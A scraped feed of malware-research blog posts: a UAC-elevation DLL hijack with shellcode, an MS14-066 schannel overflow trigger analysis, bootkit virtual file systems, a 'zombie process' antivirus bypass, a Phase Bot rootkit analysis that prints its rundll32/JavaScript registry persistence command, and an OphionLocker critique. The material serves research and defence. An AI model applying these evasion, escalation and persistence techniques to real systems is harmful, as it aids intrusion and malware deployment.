If you were to write a dll to the same path as an application and give it the same name as a commonly loaded system dll, it would likely be loaded by the application instead of the real thing; However, the dll must meet the following criteria.
  • The application must load the dll by its name and not the full path (this is common).
  • The dll must not exist in HKLM\SYSTEM\Control\Session Manager\KnownDLLs.
  • The dll must match the process architecture (64-bit processes will quietly skip 32-bit dlls and vice versa).
  • The dll should exist in system32 or syswow64, special paths don't appear to work. 

ZeroAccess abused this method to "social engineer" the user into elevating the file. This was done by downloading the Adobe Flash installer from the official site, writing the bot's dll to the same path as the installer, then running it. When the installer was executed, the UAC popup would state that the application was from a verified publisher "Adobe Systems Incorporated" and the user would probably allow it to elevate (resulting in the elevated installer loading the bot's malicious dll). 

Is it a real flash update? Is it just ZeroAccess? Nobody know.

A Less Invasive Method

What if there was a folder where 90% of the applications that require UAC elevation reside and what if it was writable from a non-elevated process? Well it turns out that folder exists: say hello to %userprofile%\Downloads\. You can probably see where I'm going with this. 

Although I wasn't expecting to find a dll that is loaded by most applications and meets all the criteria for a hijackable dll, after about 5 minutes of searching I found the motherload: dwmapi.dll. Not only does this dll meet all the criteria, but it appears to be loaded by all setup files... So let's make a hello world dll, name it dwmapi.dll, drop it to the downloads folder, and run a setup file. 



Success! The only problem here is that as soon as we start the setup it'll crash because we've replaced an important dll, however this is a fairly easy fix: dll infection. 

Writing a DLL Infector

My first idea was to simply add a new section header, change the NumberOfSections field in the PE header, then just append my section on to the end of the PE file. As it happens, directly after the last section header is the bound imports directory, which would be overwritten by our new section header. So after about 2 hours of writing an application to rebuild the entire PE from scratch, someone reminded me that the bound imports directory is just there to speed up the loading of imports and can simply be overwritten then disabled in the PE header. 

Following 15 minutes of holding CTRL + Z, I'm back to where I started and feeling a bit silly. An additional 2 lines of code has my infector working perfectly and we're ready to move on to the next step. The current infector simply disable and overwrite the bound imports directory with the new section header, append the new section to the end of the PE file, adjusts the SizeOfImage to accommodate the new section, then changes the AddressOfEntryPoint to point to our new section.

All we need now is some code for the section.

The Shellcode

The obvious choice was the make the new section execute shellcode so we don't have to worry about relocations or imports. The actual code is pretty simple and written using some handy FASM macros, I'll quickly run over how it works.
  • Checks the stack to make sure that dwmapi.dll was called with DLL_PROCESS_ATTACH
  • Navigates the PEB Ldr structure to get the base address of Kernel32 and Ntdll.
  • Usess a simple GetProcAddress implementation to import the following functions: NtOpenProcessToken, NtQueryInformationToken, NtClose, ExpandEnvironmentStringsA, CreateProcessA.
  • Opens the current process token and queries it to confirm the application we are running from is UAC elevated.
  • Gets the path of cmd.exe then executes it (UAC elevated of course).
  • Passes execution back to the real dwmapi.dll entry point so execution can continue.

Putting It All Together

The final product infects dwmapi.dll with our shellcode and places it in the download folder, once the user downloads and runs a setup that requires UAC elevation, our elevated command prompt will be spawned ( Because of Wow64FsRedirect and the fact that most setups run under wow64, we can use the same code on 32-bit and 64-bit windows).

I've uploaded the full infector and shellcode source to my github: https://github.com/MalwareTech/UACElevator





How MS14-066 (Winshock) is More Serious Than First Though

$
0
0
If you've been in a coma for the past week, MS14-066 is a TLS heap overflow vulnerability in Microsoft's schannel.dll, which can result in denial of service and even remote code execution on windows systems (the bug is exploitable during the TLS handshake stage, prior to any authentication). According to beyondtrust the problem exists in a function (schannel!DecodeSigAndReverse) which is used by the function responsible for verifying ECDSA (ECC) client certificates. The function passes the ECC signature to CryptDecodeObject and uses the returned length parameter to allocate some heap space, but then uses a separate value derived from the decoded object to copy to that memory (modifying the signature in a certain way will result in the copied memory exceeding the size of the buffer, causing a heap overflow).




The problem with MS14-066 is that in order to exploit the vulnerability, you'd need a service which uses schannel and accepts client certificates (this rules out Remote Desktop). As beyond trust showed us, IIS can be configured to require or allow client certificates, thus becomes exploitable. Obviously SSL client authentication is only used in special cases and IIS will ignore client certificates by default, so the bug should have very little impact.




If you read the TLS handsake specification, a client certificate can only be sent if the server first sends a client certificate request (Sending a client certificate without a prior request will result in the server telling you to go home and sober up, then forcibly closing the connection). IIS will only send a certificate request if client certificates are enabled, remote desktop will never. As it happens there is a second "bug" in schannel which makes MS14-066 far more dangerous. Microsoft's schannel TLS implementation doesn't exactly follow the standards and modifying the OpenSSL binaries to just stuff the client certificate down the servers throat, will result in it being processed anyway (uh-oh).

To test my theory, the first thing I did was install windows 7 32-bit in a virtual machine and setup IIS7 (making sure it is set to ignore client certificates), then I started a remote kernel debugging session and set a breakpoint on schannel!DecodeSigAndReverse (called by function responsible for handling client certificate) in lsass.exe, which processes SSL/TLS on behalf of most windows services (it's a system service so any exploitation will always result in NT AUTHORITY\SYSTEM privileges).

I started a normal TLS session to IIS with OpenSSL's s_client to check the breakpoint was not hit (it wasn't), next I modified the OpenSSL SSLv3 source to send a client certificates even though the server doesn't ask for one.




Jackpot! It was even the same story with remote desktop (RDP), a protocol that doesn't even support client certificates, I was still able to trigger a breakpoint. I don't really understand much about ECDSA / ECC so I'm not sure exactly what to modify in the signature to trigger the heap overflow (I believe some people just modified random bytes until an overflow was triggers), but this is definitely exploitable on services that don't allow client certificates, meaning that any un-patched system running IIS or RDP is exploitable (not just windows servers as previously thought).

MS14-066 In Depth Analysis

$
0
0
A few days ago I published an article detailing how a second bug, in the schannel TLS handshake handling, could allow an attacker to trigger the DecodeSigAndReverse heap overflow in an application that doesn't support client certificates. I had stated I was not familiar with ECC signatures and was unsure of how to trigger the exploit; However, a few hours research fixed that.

BeyondTrust's post implies they triggered the overflow by randomly modifying the ECC signature, though I believe this is unlikely and was just a safer alternative to disclosing exactly how to trigger the exploit. It was possible for me to achieve remote code execution with either ASLR or DEP disabled, but on a system with both  it would prove quite a challenge, thus I'm not too worried about detailing exactly how to trigger the overflow.

DecodeSigAndReverse

We already know the function in which the overflow occurs, so I decided to work backwards from there. This function is responsible for decoding the ASN.1 (DER) encoded ECC signature and returning it to be verified.



The first thing that is done here is the ECC signature is passed to CryptDecodeObject in order to calculate the total size of the decoded signature, which is used to allocate some memory using SPExternalAlloc (LocalAlloc Wrapper). CryptDecodeObject will always handle the signature correctly, with the returned size being sufficient.




CryptDecodeObject is now called again, but this time it is passed a pointer to the allocate memory in which to copy the decoded signature. The "cmp ebx, 2Fh" checks the signature type (X509_ECC_SIGNATURE) and will direct the code to the left.

The decoded signature is pointed to by an ECC_SIGNATURE header, which is 12 bytes in size an looks something like this.




What R and S are doesn't really matter here, all we need to know is they are extremely large integers. Our ECC structure now contains the size of each integer and a pointer to where it's stored.

The 2 memcpy operations should be pretty obvious now, the first one copies rSize bytes from R to some allocated memory, then the second copies sSize bytes of S to the same memory directly after R; If there's going to be an overflow It's going to be in the second memcpy. What we don't yet know is the size of the destination memory or how it's allocated.




All I had to do to find where the memory gets allocated was to look at the call graph, find the function responsible for coding DecodeSigAndReverse, then scout it for the "Dst" parameter.

This is where everything goes right (or wrong if you're Microsoft). _BCryptGetProperty is being passed "KeyLength" to... Drum roll please.... get the key length. Directly below that length is being divided by 8 (converted from bits to bytes) then doubled; this is due to the fact the signature length is (should be) double the key length. Just before the call to DecodeSigAndReverse we can see that the destination buffer is also allocated on the heap.




So back at the 2 memcpys now with knowledge of the destination buffer size, we can see exactly what triggers the heap overflow. If we use a key size of 256 bit (32 bytes), then the function is expecting a 512 bit (64 byte) signature, any more will overflow the heap and when it's freed cause a crash.

There are very few constraints on the signature, due to the fact the whole thing is just 2 massive integers. As long as we maintain a valid ASN.1 (DER) encoding and the signature is of valid size, we can write arbitrary data to the heap header resulting in an access violation or even remote code execution when the system tries to free the memory.


Fraudsters & Malware Sellers Still Shifting to the Deep Web

$
0
0
tor logoOn November the 6th and 7th a global operation (dubbed Operation Onymous) was carried out against illegal (mostly black market) sites hosted on the tor network, as a result over 400 hidden service were seized. It's still debated as to exactly how authorities managed to seize so many hidden services, but judging by the lack of arrests it is unlikely to be a severe vulnerability in the Tor network. There's not a huge deal of information about the servers seized and where they were hosted; however, the Bulgarian National Security Agency announced that they had taken down 129 hidden services, As part of Operation Onymous.

Coincidentally, if we go to the bitcoin wiki for ISPs that accept bitcoin, then filter out those located in the US or that don't allow Tor, this stands out.  

vpsbg information bitcoin wiki

An Eastern European VPS provider that accepts bitcoin and allows anonymous registrations? if i were hosting a hidden service this is probably on of the ISP I'd choose. So maybe the authorities simply just got in contact with local bitcoin and tor friendly ISPs and asked them to cooperate? An offshore ISP that respects privacy surely wouldn't cooperate, would they?


Well it turns out vpsbg are just another normal ISP abiding by the law, which makes it increasingly likely that almost all of those 129 hidden services were hosted here and all the authorities would have had to do is look for servers hosting tor hidden services, then match the private keys with onion addresses known to host illicit sites.

With the possibility that the authorities used other means to find hidden services, coupled with a lack of vendor/admin arrests, it's probably safe to say that trust in tor is still growing. Even with Operation Onymous' smoke and mirrors campaign designed to scare criminals away from Tor, It doesn't really come as a huge surprise that fraud and malware vendors are also finding safe haven on the deep web.

Evolution Market was arguably one of the 3 largest black markets prior to Operation Onymous, now the largest, it offers a platform for fraudsters and malware authors as well as the usual drug and arms dealers.

Despite the take downs, interest is still growing.


Hundreds of listings for stolen credit cards.

Listings for ATM skimmers and POS malware

Some scriptkiddie trying to sell the open source bootkit I posted on my github

There are a lot of reasons why cybercriminals would prefer tor market places over conventional ones. Generally a lot of native English speakers are living in countries where it's not in their best interest to be running high profile malware/carding forums, those clearnet marketplaces that do exist tend to run very strict screening policy to keep out law enforcement and security researchers; this is usually undesirable to vendors as it results in many legitimate members being banned on suspicion of being federal agents, or "Brian Krebs" in the case of darkode.
There's also the built in anonymity and DDoS protection offered by tor which makes admin's and user's jobs much easier. 




Virtual File Systems for Beginners

$
0
0
A virtual File System (VFS), sometimes referred to as a Hidden File System, is a storage technique most commonly used by kernel mode malware, usually to store components outside of the existing filesystem. By using a virtual filesystem, malware developers can both bypass antivirus scanners as well as complicating work for forensic experts.

Filesystem Basics

If you're running Windows and not using hardware from the 90s, or have your OS installed on a flash drive; chances are, you're using the New Technology File System (NTFS). In order to understand how a VFS benefits malware developers, first we need to dive into a bit of filesystem basics. 

NTFS disk layout

In this example we have a disk containing only one partition (which runs Windows).

  • The Master Boot Record (MBR) gives the system information about the partition, such as its start sector and size.
  • The Volume Boot Record (VBR) is the primary boot code and will load and Windows bootloader and execute it; The VBR is the first sector within the NTFS partition. 
  • $BOOT is the boot area and contains the Windows boot loader.
  • $MFT is the Master File Table and tells the system where to find files within the filesystem.

Antivirus Scans
A full system scan will go through every file in the master file table and scan it, additionally the antivirus can hook the filesystem driver and scan files on creation / write. If somebody didn't want a file to be scanned, not adding an entry to the MFT would be a good start. Unfortunately, if sectors within the partition are not referenced by the MFT, they are assumed unused and likely to be overwritten as more files are written to the disk.

Malware Forensics
There are lots of techniques used when analyzing an infected system; however, looking for new/modified files is a common starting point for an analyst. To speed up file deletion, the system simply deletes the file's record in the MFT but leaves the actual file intact, this way the sectors can be overwritten by an new file and the system doesn't have to waste time zeroing out the old one. Due to the fact there's going to be random data left by deleted files all over the disk, it's very easy for an encrypted virtual filesystem to hide, further complicating analysis.

Obviously if we can't write directly to free sectors within the partition for fear of them being overwritten, then we're going to have to write our VFS outside of the partition; What makes this possible is the fact that there is unused reserves space on both ends of the disk. 

Disk Basics

For people who are interested in the (very technical) reasons behind the reserved space at the beginning and end of the disk, I suggest reading this section. If you're not interested or easily confused, skip to Virtual File Systems.

A hard disk platter

Space after the MBR
A disk platter is divided into tracks which are divided into sectors; a single sector is 512 bytes in size and there are a fixed number of sectors per a track. As technology advanced the physical size of sectors got smaller so more sectors could be fit onto a single track; however, the MBR field that describes the number of sectors is 6 bits in size, thus can only support numbers 0 - 63, limiting the sectors per track to 63.

Eventually, someone figured out that the the closer to the edge of the disk you get, the longer the tracks are and the more sectors the can hold. Nowadays the number of sectors per a track varies depending on how far away from the spindle the track is, making the sectors per a track field of the MBR totally meaningless; For compatibility reason, disks with more than 63 sectors per a track will just leave the value set at 63, the same goes for SSDs or other media that doesn't have tracks. 

For optimization reasons when partitioning the disk, the Windows partition manager will read the sectors per track value and align the partition on the track boundary (63 sectors per track vmeans that the MBR will be sector 0 track 0, while the start of the partition will be sector 0 track 1, leaving 62 sectors of unused space between the MBR and first partition).

The only problem with aligning the partition to 63 virtual (512kb) sectors is if the disk internally used 4kb sectors, then there's going to be a huge performance penalty because 63 * 512 is not a multiple of 4kb, so the OS will constantly be writing across sector boundaries and wasting time with unnecessary Read-Modify-Write cycles. In Windows Vista and onward Microsoft addresses this issue by starting the partition on the 2048th sector (leaving 1 MB of reserved space and 4kb aligning the partition), nobody is exactly sure why they chose to leave so much space, but when it comes to malware, 1 MB is a lot of storage. 

Space at then end of the disk
Because the space at the start of the disk can be pretty small and isn't guaranteed on GPT systems, the space at the end may be a better bet. When allocating a partition, the Windows partition manager will end the partition before the end of the disk to leave space for dynamic disk information. As it happens, dynamic disks are incredibly rare on most computers because they're only used for software RAID and other black magic, which leave between 1 mb and 100 mb of space at the end of the disk. 

Virtual File System

The location of the Virtual File System depends on the space needed and the system specifications, here's a quick overview of the reserved space.

Start Of Disk
  • On XP systems using the MBR partition format you are guaranteed 62 sectors (31.7 KB) of space between the MBR and the first partition.
  • On Vista+ systems using the MBR partition format you are guaranteed 2047 sectors (1 MB) of space between the MBR and the first partition. 
  • Because the GUID Partition Table (GPT) is of variable size and not restricted to 1 sector like the MBR, it is uncertain how much space will be available on systems using the GPT.
  • Other than by the GPT, this space is never used by windows. 
End Of Disk
  • Between 1 MB and 100 MB, there doesn't appear to be any OS specifications for the exact size so the variation is likely to do with disk geometry (Ex: 1 disk track is reserved).
  • Some of the space can be used for dynamic disk information (most system do not use dynamic disks unless using software RAID).

Contrary to popular belief, a VFS can be created and accessed by a user mode application, as long as it is running as administrator. To prevent malware from bypassing kernel code signing, raw disk access was "disabled" in vista and onward; however, there is an exception for boot sectors and sectors residing outside of the filesystem (both reserved areas reside outside the filesystem), enabling user mode access to the VFS. Although, direct user mode access is possible, most malware tends to manage the VFS from a kernel driver and expose an API to user mode components for reading/writing via the driver; This allows the VFS to be hidden from normal applications and other drivers.

VFS driver and disk driver stack

It's quite common for a VFS driver to send requests directly to the lowest level disk driver (the disk miniport), as a result the disk read/write requests cannot be intercepted by the antivirus or any standard disk monitors, providing better stealth. Although you could write standard files using this method, ntfs.sys handles the NTFS specification, so you'd have to create your own ntfs driver which would be a lot of work especially as NTFS is not fully documented by Microsoft. 

The actual format of the VFS is entirely dependent on the developer, some have chosen to use FAT32 with RC4 encryption, whilst others use custom file systems with modified encryption algorithms. Almost always the VFS is encrypted in an attempt to make the data look like random leftover bytes and not executables or log files.

Bootkits most commonly use a VFS because it reduces the attack surface to a single point of attack: The infected bootloader reads the rootkit driver from the VFS and loads it into the kernel long before the antivirus, leaving the kernel driver time to install hooks and cover its tracks before the OS even initializes. A bootkit using a VFS driver has only one weakness: The infected boot record; this can be easily resolved by using the bootkit's driver to hook the disk miniport and spoof read/write requests to the boot sector, tricking the AV into thinking the boot sector contains the original Windows boot code, the same method can also be used to just display empty sectors if something other than the rootkit tries to read the VFS.

Zombie Processes as a HIPS Bypass

$
0
0
A long long time ago (about 10 years in non-internet time) malware developers only had to worry about signature based detection, which could be easily bypasses with polymorphic droppers or executable encryption. To deal with rapidly evolving malware, capable of evading signature detection, HIPS was created.

HIPS (Host-based Intrusion Prevention System), sometimes referred to as Proactive Protection or Proactive Defense, is an anti-malware technique designed to detect malware by behavior, and not its file signature. Using kernel mode callback and hooking, HIPS systems can monitor which functions an executable calls, with which parameters, and in what order. By monitoring executable calls the HIPS can get a decent idea of what the executable is trying to do, Ex: Allocating executable memory in a foreign process, followed by creating a thread that resides in the allocated memory; The process is likely trying to inject code. Once the executable tries to perform an action that is deemed malicious, the system can decide what to do based on how common the application is, if it's signed and by whom. For a malicious executable to escape a HIPS, it would have to trick the system into believing it's a legitimate signed application.

Due to non-static data within a process, such as absolute addresses, imports, and statically allocated variables; it is not possible to verify the digital signature of a running process. To check a process' signature, the HIPS would have to get the executable file path from the PEB (Process Environment Block) or the section handle, then verify the signature of the file on disk.

Zombie Processes

The concept of zombie processes is pretty simple: we can create a standard Windows process in a suspended state, then write our malicious code to the processes' memory; the PEB and the EPROCESS structures will still be that of the original process, causing the HIPS to see the now malicious process as a legitimate signed executable (this is not RunPE or dynamic forking, because we don't unmap the original executable and replacing it with our malicious one, as thos can be detected in multiple ways). It's basically PE injection, but with less exposure to functions that would allow the HIPS to detect code injection. 
  • CreateProcess returns a handle to the created process and its main thread with full access, so we don't have to call OpenProcess or OpenThread.
  • The main thread is in a suspended state and we know the entry point, so no need to call CreateRemoteThread.
  • Modification to a child process is far less suspicious that a foreign one.

Injecting the Code
A common practice is to call VirtualAllocEx to allocate memory, then use the returned address to relocate the code ready to run at that address. Once the code has been prepared, it can be written to the process with WriteProcessMemory. This is a terrible idea, every HIPS ever expects malware to do that. A better practice used by newer malware (such as Andromeda and BetaBot) is to create as section, then use NtMapViewOfSection to map the section into both the current process and the target process. It's not really possible to know what address the section will be mapped at before mapping it, so this would cause a problem with code that requires relocation.

NtMapViewOfSection actually maps the same physical section into both processes (writing the map of the section in the current process will also write the map in the target process), we can simply map the section into both processes then relocate and write the code to the section in the current process, resulting in it also being written to the target process, no WriteProcessMemory needed!

Executing the Code
There's a few ways to do this, but I'll go over the 2 most common.
  • Use SetThreadContext to change the EAX register (which points to the process entry point) to the entry point of your code.
  • Use WriteProcessMemory to write a jump from the process entry point to your code.

Conclusion

Once the code is running inside the trusted process, it is likely to have far more freedom as to what it can do without triggering antivirus warnings, the PEB, EPROCESS and Section Handle, all still point to the original process.

As always I've included some example code: https://github.com/MalwareTech/ZombifyProcess

Like magic!








Phase Bot - A Fileless Rootkit (Part 1)

$
0
0
Phase Bot is a fileless rootkit that went on sale during late October, the bot is fairly cheap ($200) and boasts features such as formgrabbing, ftp stealing, and of course the ability to run without a file. The bot has both a 32-bit binary (Win32/Phase) and a 64-bit binary (Win64/Phase), despite the fact that both binaries operate in exactly the same way.



The first thing you notice when opening it up in IDA is that the AddressOfEntryPoint is 0, this may seem like an error, but it actually isn't. Setting the entry point to 0 means the start of the DOS header is used as the entry point, this is possible because most of the fields following the MZ signature aren't required, and the M (0x4D) Z (0x5A) are actually valid instructions (dec ebp and pop edx respectively). I'm not sure the actual purpose of this trick, but it's interesting nonetheless.

Cancels out the MZ instructions then jumps to real entry point.

The real entry point is contained within the first 560 bytes of the only section in the executable, this code is designed to get data stored within the non-essential NT header fields and use it to RC4 decrypt the rest of the section, which contains the 2nd stage (shellcode).



Most initialization happens is what appears to be the world longest function; the executable doesn't have an import table so functions are resolved by hash. All the initialized data such as offsets, strings, and function addresses is stored within a large structure which is passed to all functions.

but does anyone truly know what loops are?

Once initialization is done the bot then check that PowerShell and version 2 of the .net framework is installed: if it is, normal installation continues, if not, it writes the bot code to a file in the startup folder.

The malware first creates the registry key "hkcu\software\microsoft\active setup\installed components\{<GUID_STRING>}", then RC4 encrypts the 2nd stage's shellcode with the key "Phase" and writes it under the subkey "Rc4Encoded32", afterward the 64-bit shellcode is extracted and written to Rc4Encoded64 subkey, also encrypted with "Phase" as the key, a 3rd subkey is created named "JavaScript" which contains some JavaScript code.



The full JavaScript is a bit long to post here, so I've uploaded it to pastebin. It simply base64 decodes a PowerShell script designed to read and decrypt the shellcode from the Rc4Encoded subkey, then runs; you can find the decoded PowerShell script here (the comments were left in by the author).

For the bot to start with the system, a subkey named "Windows Host Process (RunDll)" is created under "hkcu\software\microsoft\windows\currentVersion\run", with the following value:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\Software\\Microsoft\\Active%20Setup\\Installed%20Components\\{72507C54-3577-4830-815B-310007F6135A}\\JavaScript"));close();
This is a trick used by Win32/Poweliks to get rundll32 to run the code from the JavaScript subkey, which then base64 decode the PowerShell script and runs it with PowerShell.exe, you can read more about this trick here.



The final stage, which runs from within PowerShell hooks the following functions by overwriting the first instruction with 0xF4 (HLT).

  • ntdll!NtResumeThread (Inject new processes)
  • ntdll!NtReadVirtualMemory (Hide malware's memory)
  • ntdll!NtQueryDirectoryFile (Hide file, only if failed fileless installation)
  • ws2_32!send (Data stealer)
  • wininet!HttpSendRequest (Internet Explorer formgrabber)
  • nss3!PR_Write (Firefox formgrabber)

The HLT instruction is a privileged instruction which cannot be executed from ring 3, as a result it generates an 0xC0000096 Privileged Instruction exception, which the bot picks up and handles using a vectored exception handler. This is the same as standard software breakpoint hooking, but using an invalid instruction instead of int 3.



As you can imagine, the executable shows all sorts of malicious signs.

NULL AddressOfEntryPoint, missing all data directories, invalid section name.

It should be noted that some of the features advertised appear to be missing and the comments in the PowerShell code suggest that this sample is an early/testing version. I'll update if I can get hold of a newer version. 

Phase Bot - A Fileless Rootkit (Part 2)

$
0
0
As I said in the last part of the analysis the sample I had was just a test binary, but now I have some real ones thanks to some help from @Xylit0l. The new binaries incorporate some much more interesting features which I'll go over in this article.

Reverse Connection

Although Phase is not a banking Trojan as it only supports standard form grabbing, it does have some banking Trojan features such as Reverse RDP  and Reverse SOCKS. The idea behind this is that the RDP or SOCKS daemon on the infected machine connects to the client (the bot master or command and control server), as opposed to the other way round, allowing infected machines behind NAT/Firewalls to still be used as servers. 

Interestingly, the RDP interface is built into the C&C panel and only allows basic mouse / keyboard input; As you'd expect this is very slow and incredibly demanding on the HTTP server.

Embedded Reverse RDP

Module Loader

The module loader allows the bot functionality to be extended via paid or 3rd party modules. These modules are uploaded to the panel ready to be installed by the bot, which supports storing modules on disk or in a registry key (registry stored modules are manually loaded into memory and executed by the bot, thus bypassing anti-virus scanners).

Options specifying how the bot should handle the module.

Modules

The modules themselves are 32-bit or 64-bit DLLs (depending on the system architecture), they're downloaded from the panel and stored in an RC4 encrypted format either on the disk or in the registry. Even with RC4 encryption, they are very easy to identify and dump due to a static encryption key and format. 


In the wild we've only found 3 modules (all of which are made by the same developer as Phase).
  • vnc32 - reverse VNC daemon (32-bit).
  • vnc64 - reverse VNC daemon (64-bit).
  • scan32 - Point of Sales Track1/Track2 stealer (32-bit).

As of writing this both the encrypted and decrypted versions of each module have absolutely no detections on virustotal:


MD5: 5767b9bf9cb6f2b5259f29dd8b873e36
SHA1: 6cb74b4e309d80efbe674d3d48376ee1f7e2edda
SHA256: 3a9f8f9dc215be8bc8d278ab99f5e6bdac2d1732d4a3b536d55696dfe766491a

MD5: 1fa781b2ece5dfa36d51704c81e61e19
SHA1: d379bf330153c1bf742f59013ea6636e02ff28b4
SHA256: e1988a1876263837ca18b58d69028c3678dc3df51baf1721535df3204481e6a1

MD5: 94eefdce643a084f95dd4c91289c3cf0
SHA1: 0bbd15c31782a23b1252544221c564866975ea7e
SHA256: c33f2fdd945d053991e178fa12ab9ffea18f751313a8888c74004cbd680bbd75

MD5: d7da422a3d23de95a9c3c969a31430e9
SHA1: 32bcf2adafc5b189c04619c7c484d77a21861aba
SHA256: f88d5320b3882108f50d3c234313fe604956c0fc057c75b85cdfc3b8e6e9bfd1


OphionLocker: Proof Anyone Really Can Write Malware

$
0
0
OphionLocker is supposedly the new ransomware on the block and is already being compared with sophisticated operations such as CryptoLocker and CryptoWall, so i decided to take a look and what I found is nothing short of hilarious.


That's right, the ransomware is actually a console application, Instead of writing the Win32 application. The developer has opted to use a console application, which implies he is either writing command line tools (he's not), or that he has absolutely no damn idea what he's doing.

If there is even any shadow of doubt that this was written by a competent C++ developer, this should set the record straight:

H:\\ConsoleApplication1\\Release\\ConsoleApplication1.pdb

That's the PDB path of this application: "ConsoleApplicationX" is the name chosen by Visual Studio when automatically creating a new C++ console project, ConsoleApplication1 implies that this is the first Visual Studio project created; either the developer has just moved from another development environment, or more likely he's never coded C++ before.


This is a hack to make the console window invisible, as a result the console window will open and then disappear a second later when running the application.



If you're new to programming, writing your own cryptographic library is obviously quite a challenge, as you can see he's opted to just use the Crypto++.

"But MalwareTech, even using a public cryptographic library, he'd need to know how to implement it."

Well if we look through the strings in the application, we find the following string: "ecies.private.key", which is the name of the file that the application uses to store the private key; this is consistent with the example ECIES (Elliptic Curve Integrated Encryption Scheme) code on the Crypto++ wiki.



The C&C communicated mechanism is much of the same story, although it could have been implemented with a few lines of code using the WinInet library, the developer has opted to use the insanely bulky HTTP Client library WinHTTPClient, which uses the WinHTTP api (should only be used for service and not client applications).



Obviously, no application is complete without some error handling, so here's what happens if the locker fails to connect to the C&C.

Error handling is love, error handling is life.


GUI programming tends to be quite tricky, but it's nothing you cant achieve with a message box and 300 text files that all say the same thing.
This is why we can't have nice things.

Conclusion

Q: Can you code functional ransomware with absolutely no programming experience whatsoever?
A: Yes.



OphionLocker
MD5: e17da8702b71dfb0ee94dbc9e22eed8d
SHA1: eb78b7079fabecbec01a23c006227246e78126ab
SHA256: c1a0173d2300cae92c06b1a8cb344cabe99cf4db56fa9dca93629101c59ce68f
Viewing all 138 articles
Browse latest View live